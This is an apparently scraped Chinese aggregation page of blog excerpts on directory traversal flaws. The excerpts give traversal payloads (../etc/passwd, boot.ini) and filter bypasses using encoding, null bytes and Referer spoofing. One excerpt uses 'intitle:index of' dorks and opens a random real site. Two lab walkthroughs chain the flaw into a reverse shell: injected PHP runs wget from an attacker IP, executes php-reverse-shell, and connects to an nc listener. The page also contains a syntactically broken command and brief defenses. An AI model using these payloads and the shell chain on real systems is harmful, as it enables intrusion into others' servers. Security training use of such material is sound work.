精华内容
下载资源
问答
  • 该插件使用两种主要技术来识别目录遍历漏洞 检测方法 静电检测 动态检测 i) 使用在中指定的预定义有效,这些将运行时从 GitHub 获取并与匹配 ii) 仍开发中。 目的是检测与/static/css/main.css/和/static/../...
  • 许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名形如:http://www.nuanyue.com/getfile=image.jgp当服务器处理...初看,只是文件交互的一种简单的过程,但是由于文件名...

    许多的Web应用程序一般会有对服务器的文件读取查看的功能,大多会用到提交的参数来指明文件名

    形如:http://www.nuanyue.com/getfile=image.jgp

    当服务器处理传送过来的image.jpg文件名后,Web应用程序即会自动添加完整路径,形如“d://site/images/image.jpg”,将读取的内容返回给访问者。

    初看,在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“../”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。

    发现路径遍历漏洞

    路径遍历漏洞的发现,主要是对Web应用程序的文件读取交互的功能块,进行检测,面对这样的读取方式:

    “http://www.nuanyue.com/test/downfile.jsp?filename=fan.pdf”

    我们可以使用 “../”来作试探,

    比如提交Url:“getfile=/fan/fan/*53.pdf”,而系统在解析

    是“d://site/test/pdf/fan/fan/../../*53.pdf"

    通过“../”跳转目录“/fan”,即“d://site/test/pdf/*53.pdf”,

    返回了读取文件的正常的页面。

    路径遍历漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名,从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限进行跨越目录访问,

    比如访问一些受控制的文件,“../../../../../../../etc/passwd“或

    者”../../../../boot.ini“,当然现在部分网站都有类似Waf的防护设备,只要在数据中会有/etc /boot.ini等文件名出直接进行拦截。

    遍历路径攻击变异

    路径遍历漏洞是很常见的,在Web应用程序编写过程,会有意识的对传递过来的参数进行过滤或者直接删除,存在风险的过滤方式,一般可以采用如下方式进行突破:

    以下是一些绕过的方法,当然在实际运行过程中,可以组合使用。

    (1)加密参数传递的数据;

    在Web应用程序对文件名进行加密之后再提交,比如:“downfile.jsp?filename= ZmFuLnBkZg- “,在参数filename用的是Base64加密,而攻击者要想绕过,只需简单的将文件名加密后再附加提交即可。所以说,采用一些有规律或者轻易能识别的加密方式,也是存在风险的。

    (2) 编码绕过,

    尝试使用不同的编码转换进行过滤性的绕过,比如Url编码,通过对参数进行Url编码提交,“downfile.jsp?filename= %66%61%6E%2E%70%64%66“来绕过。

    (3) 目录限定绕过;

    在有些Web应用程序是通过限定目录权限来分离的。当然这样的方法不值得可取的,攻击者可以通过某些特殊的符号“~“来绕过。形如这样的提交“downfile.jsp?filename=~/../boot”。能过这样一个符号,就可以直接跳转到硬盘目录下了。

    (4)绕过文件后缀过滤;

    一些Web应用程序在读取文件前,会对提交的文件后缀进行检测,攻击者可以在文件名后放一个空字节的编码,来绕过这样的文件类型的检查。

    例如:../../../../boot.ini%00.jpg,Web应用程序使用的Api会允许字符串中包含空字符,当实际获取文件名时,则由系统的Api会直接截短,而解析为“../../../../boot.ini”。

    在类Unix的系统中也可以使用Url编码的换行符,例如:../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名,会截短为文件名。也可以尝试%20,例如: ../../../index.jsp%20

    (5) 绕过来路验证。

    Http Referer :HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的

    在一些Web应用程序中,会有对提交参数的来路进行判断的方法,而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可,这主要是原因Http Referer是由客户端浏览器发送的,服务器是无法控制的,而将此变量当作一个值得信任源是错误的。

    防范遍历路径漏洞

    在防范遍历路径漏洞的方法中,最有效的是权限的控制,谨慎的处理向文件系统API传递过来的参数路径。主要是因为大多数的目录或者文件权限均没有得到合理的配置,而Web应用程序对文件的读取大多依赖于系统本身的API,在参数传递的过程,如果没有得严谨的控制,则会出现越权现象的出现。在这种情况下,Web应用程序可以采取以下防御方法,最好是组合使用。

    (1) 数据净化,对网站用户提交过来的文件名进行硬编码或者统一编码,对文件后缀进行白名单控制,对包含了恶意的符号或者空字节进行拒绝。

    (2) Web应用程序可以使用chrooted环境访问包含被访问文件的目录,或者使用绝对路径+参数来控制访问目录,使其即使是越权或者跨越目录也是在指定的目录下。

    总结

    路径遍历漏洞允许恶意攻击者突破Web应用程序的安全控制,直接访问攻击者想要的敏感数据 ,包括配置文件、日志、源代码等,配合其它漏洞的综合利用,攻击者可以轻易的获取更高的权限,并且这样的漏洞在发掘上也是很容易的,只要对Web应用程序的读写功能块直接手工检测,通过返回的页面内容来判断,是很直观的,利用起来也相对简单。

    还有一种目录遍历 那就是因为这个web服务器的配置不当造成的

    index of /

    我们可以直接利用百度语法来寻找此形式的目录遍历漏洞

    intitle:index of

    8cf6157f5a8e6f377c8e040bf5d50443.png

    随意找一个演示下

    255509ceda284aecc86f328bfd215c72.png

    展开全文
  • 目录遍历漏洞

    千次阅读 2021-01-04 20:42:37
    开始之前,先介绍一下目录遍历漏洞的原理 目录遍历漏洞原理比较简单,就是程序实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符...

    在开始之前,先介绍一下目录遍历漏洞的原理
    目录遍历漏洞原理比较简单,就是程序在实现上没有充分过滤用户输入的…/之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。这里的目录跳转符可以是…/,也可是…/的ASCII编码或者是unicode编码等。

    靶机

    链接:https://pan.baidu.com/s/1rkcs2rhBPch3Q5beSZJ4Rg
    提取码:20td

    漏洞复现过程

    1. 使用netdiscover发现存活主机
    netdiscover -i eth0
    

    在这里插入图片描述

    1. 使用nmap进行服务探测
    nmap -sV 172.20.10.9
    

    在这里插入图片描述

    1. 使用nmap时并没有发现有明显的可利用漏洞,因此使用OWSAP_ZAP进行web漏洞扫描
    • 使用OWSAP_ZAP时发现目标网站存在目录遍历漏洞
    • 访问目标的URL地址,得到以下信息
      在这里插入图片描述
      在这里插入图片描述
    • 不难发现,页面返回的是/etc/passwd的秘密文件信息
    1. 使用dirb进行目录挖掘
    dirb http://172.20.10.9
    
    • 发现了dbadmin后台数据库,尝试使用admin密码登录成功
    • 若在实战中尝试失败,可以利用sql-post注入等使用sqlmap进行密码爆破
      在这里插入图片描述
      在这里插入图片描述
    1. 进入数据库后,点击创建一个shell.php数据库
      在这里插入图片描述
      在这里插入图片描述
    2. 生成一个php的shellcode代码,用于反弹网站的webshell
    cd /usr/share/webshells/php
    cp php-reverse-shell.php /root/Desktop/shell.php
    
    • 编辑shellcode.php文件,IP地址设置为本机ip,端口为自己想要侦听的端口
      在这里插入图片描述
    1. 完善数据库信息,在Default Value值出填入以下代码用于执行shellcode
      在这里插入图片描述
    • 要在Default Value填入的字段
    <?php system("cd /tmp;wget http://172.20.10.7:8000/shellcode.php;chmod +x shell.php;php shell.php);"?>
    
    1. 使用python快速搭建一个http的web服务,默认开启的是8000端口
    python -m "SimpleHTTPServer"
    
    1. 使用nc命令监听4444端口
    nc -nlvp 4444
    
    1. 将最后的etc%2Fpasswd字段值替换为/usr/databases/shell.php即可反弹webshell
      在这里插入图片描述
    • 反弹成功
      在这里插入图片描述
    1. 使用python命令优化终端
    python -m "import pty; pty.spawn('/bin/bash')"
    
    • 成功获取www-data用户权限
      在这里插入图片描述
    展开全文
  • 目录遍历漏洞介绍路径遍历攻击(也称为目录遍历)是指访问储存web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储文件系统上的...

    目录遍历漏洞介绍

    路径遍历攻击(也称为目录遍历)是指在访问储存在web根目录文件夹之外的文件和目录。通过操纵带有“点-斜线(..)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。

    需要注意的是,系统操作访问控制(如在微软windows操作系统上锁定或使用文件)限制了对文件的访问权限。

    这种攻击也称为 “点-点斜线”、“目录遍历”、“目录爬升”和“回溯”。

    搭建一个存在目录遍历漏洞的虚拟机,做个实验。

    使用Owasp zap进行漏洞扫描,挖掘漏洞。

    dfca445c788c1f57025a617a15c6c404.png然后复制它的URL到浏览器查看该漏洞

    556bd33686cb9416dd1f2f37729d8785.png目录遍历的漏洞通过`../../../`这样的形式来进行目录读取服务器中的文件,`../../../../`越多多好,因为在终端中,`../`是返回上一级目录,到根目录使用`../`会返回当前页面。

    174694138c9dfe52093f574c5feb041a.png一般发现目录遍历的漏洞的探针,也就是测试的时候往往是使用这样的payloadhttp://www.xxxx.com/xxx.php?page=../../../../../../../../../../../../../etc/passwd

    看是否会返回该文件的内容,这就造成了目录遍历的漏洞产生。

    还可以本地利用PHP环境搭建一个读取文件的脚本。来实现目录遍历。<?php

    $dir_path=$_REQUEST['path'];

    $page=scandir($dir_path);

    var_dump($page);

    ?>

    一些绕过方式

    1. 加密参数传递的数据

    有的网站程序传递参数后会进行base64加密(当然也会有其他加密),导致我们传递的参数无法解析,所以就无法利用目录遍历,而绕过方式也很简单,就是先对参数进行base64加密后再进行传参。如:

    `?page=bTByZS50eHQ=`

    2. 编码绕过

    进行传参时将参数进行编码,实现绕过,比如URL编码。`?page=%6D%30%72%65%2E%74%78%74`

    3. 目录限定绕过

    有些Web应用程序是通过限定目录权限来分离的。可以使用一些特殊的符号`~`来绕过。比如提交这样的`xxx.php?page=~/../boot`。就可以直接跳转到硬盘目录下。

    4. 绕过文件后缀过滤

    一些Web应用程序在读取文件前,会对提交的文件后缀进行检测,攻击者可以在文件名后放一个空字节的编码,来绕过这样的文件类型的检查。

    比如:`../../../../boot.ini%00.jpg`,Web应用程序使用的Api会允许字符串中包含空字符,当实际获取文件名时,则由系统的Api会直接截短,而解析为`../../../../boot.ini`。

    在类Unix的系统中也可以使用Url编码的换行符,例如:`../../../etc/passwd%0a.jpg`如果文件系统在获取含有换行符的文件名,会截短为文件名。也可以尝试%20,例如: `../../../index.php%20`

    5. 绕过来路验证Http Referer : HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的

    在一些Web应用程序中,会有对提交参数的来路进行判断的方法,而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可,这主要是原因Http Referer是由客户端浏览器发送的,服务器是无法控制的,而将此变量当作一个值得信任源是错误的。

    还有就是web服务器配置不当而造成的目录遍历漏洞,

    可以使用谷歌语法进行查找。

    使用      intitle: index of

    随便选择一个打开就是了。

    dda8fb2662b8862d3f5ab6e9e8930244.png

    防御

    可以对提交的参数进行多次编码或者多种加密。上面的几种绕过方式进行组合使用。

    如何利用目录遍历上传shell并拿到一个低权限

    利用目录遍历漏洞获取shell思路上传webshell到服务器,之后通过对应的目录遍历路径访问webshell,执行webshell。在kali linux中获取反弹shell;

    需要和其他知识相结合,这里直接略过简单步骤

    略过的操作:探测敏感目录,弱口令登录,查找利用的webshell上传点。

    使用`/usr/share/webshells/php`中的反弹的webshell

    将webshell中的IP和要监听的端口改一下$ip = '10.0.2.4'; // CHANGE THIS

    $port = 4444; // CHANGE THIS

    然后进行利用,建数据库数据表,然后插入字段

    3aadcf1c726a03586829a4129e6557c2.png

    写入<?php system("cd /tmp;wget http://10.0.2.4:8000/webshell.php;chmod +x webshell.php;php webshell.php");?>

    解析:切换至tmp目录,然后在kali的服务器中下载webshell,然后赋给文件执行权限,再执行。

    141481ab76783f3524c22407025e45e4.png

    可以看到已经写入了数据。插入了命令

    创建服务器用来让靶场下载webshell

    同时开启nc侦听端口

    59d95085e95d4d8a4fbfce49844b59b1.png

    上面这都是前置设置,这些设置完成后,就可以执行目录遍历漏洞下载并执行shell了

    ` /usr/databases/shell.php`这个是命令所在的文件,使用目录遍历漏洞访问并执行。

    payloadhttp://10.0.2.5/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fdatabases%2Fshell.php

    拿到一个较低权限的shell

    ee0dee2121f0226672d3048a443d6496.png

    下次学习提权。如何将此类低权限提升至root权限。

    展开全文
  • 发布日期:2011-12-26更新日期:2012-01-05受影响系统:Nginx Nginx 1.1.10描述:----------------------------------------------------...nginx的某些配置方式存在错误,可被远程攻击者利用造成目录遍历。建议:--...

    发布日期:2011-12-26

    更新日期:2012-01-05

    受影响系统:

    Nginx Nginx 1.1.10

    描述:

    --------------------------------------------------------------------------------

    nginx是一款使用非常广泛的高性能web服务器。

    nginx的某些配置方式存在错误,可被远程攻击者利用造成目录遍历。

    建议:

    --------------------------------------------------------------------------------

    临时解决方法:

    使用如下配置

    location /paper {

    alias /home/wwwroot/paper;

    location /paper/ {

    alias /home/wwwroot/paper/;

    厂商补丁:

    Nginx

    -----

    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

    0b1331709591d260c1c78e86d0c51c18.png

    展开全文
  • 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以更容易得到网站权限,...
  • 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息。
  • nginx目录遍历漏洞复现

    千次阅读 2021-11-18 15:16:52
    nginx目录遍历漏洞复现 漏洞描述: Nginx的目录遍历与apache一样,属于配置方面的问题,错误的配置可导致目录遍历与源码泄露。 漏洞原理: 修改nginx.conf,如下图位置添加autoindex on 环境搭建: ubuntu ...
  • Jetty中捆绑有HTTP服务器、HTTP客户端和javax.servlet容器, 其中HTTP服务器的URI处理器没有正确的解释规范的路径,远程攻击者可以通过目录遍历攻击访问web应用或文档树以外的文件。成功利用这个漏洞要求使 用了支持...
  • 该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
  • 用友NC目录遍历漏洞

    千次阅读 2021-04-26 09:41:57
    用友NC目录遍历漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X005 POC0X006 修复建议 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 搜索...
  • 通告信息2021年1月06日,安识科技A-Team团队监测到Apache Flink 发布了目录穿越的漏洞通告,CVE编号为CVE-2020-17518,CVE-2020-17519。Apache Flink是一个开源流处理框架,其核心是用Java和Scala编写的分布式流数据...
  • 攻防:目录遍历漏洞简介

    千次阅读 2019-09-27 15:29:55
    2014年3月22日,乌云漏洞报告平台爆出国内某著名网站存在漏洞,安全支付日志可被遍历下载,该事件网络中迅速扩散,让用户意识到了目录浏览和目录遍历漏洞巨大的危害性,目录遍历这个古老的漏洞再次成为网络热点。...
  • 漏洞之目录遍历漏洞

    千次阅读 2020-01-10 16:36:30
    目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 ...
  • 目录遍历漏洞讲解(IIS、Apache)

    千次阅读 2019-10-20 15:08:23
    目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意文件,甚至执行系统命令。 IIS IIS目录...
  • Apache Flink目录遍历漏洞复现(CVE-2020-17518)1.漏洞复现1.1漏洞背景Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行...
  • /*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploitc0d3r: mywisdomthanks for not being lame to change exploit authortis is one of my linux w0rm module for user e...
  • 目录遍历漏洞详解

    万次阅读 2017-07-13 16:45:49
    目录遍历是Http所存在的一个安全漏洞,它使得攻击者能够访问受限制的目录,并Web服务器的根目录以外执行命令。  Web服务器主要提供两个级别的安全机制:  访问控制列表——就是我们常说的ACL  根目录...
  • 渗透测试之目录遍历漏洞

    万次阅读 2017-12-13 14:00:44
    先上一张图看看什么是目录遍历漏洞。 对,目录遍历就长成这样子 一般遇到目录遍历漏洞,我们常做的就是去寻找有价值的东西去下载,比如数据库 一般是没有index.php就可能出现像这样的一个目录遍历的漏洞...
  • 渗透人员可通过目录遍历攻击获取服务器的配置文件等等资料。一般的说,它调用服务器的标准API、使用的是文件的标准权限。所以它攻击的不是什么漏洞,而是网站设计人员的思想“缺陷”。常见的目录遍历攻击,访问“../...
  • 文章目录Apache Flink 任意文件上传漏洞 (CVE-2020-17518)0x00 漏洞描述0x01 影响版本0x02 靶场环境0x03 漏洞分析0x04 漏洞复现0x05 反弹shellApache Flink 任意文件读取漏洞 (CVE-2020-17519)0x00 漏洞描述0x01 ...
  • 目录遍历漏洞原理及其防御方法

    万次阅读 2019-03-19 21:11:47
    目录遍历漏洞原理 目录遍历(路径遍历)是由于Web服务器或者Web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 14,476
精华内容 5,790
关键字:

在发现目录遍历漏洞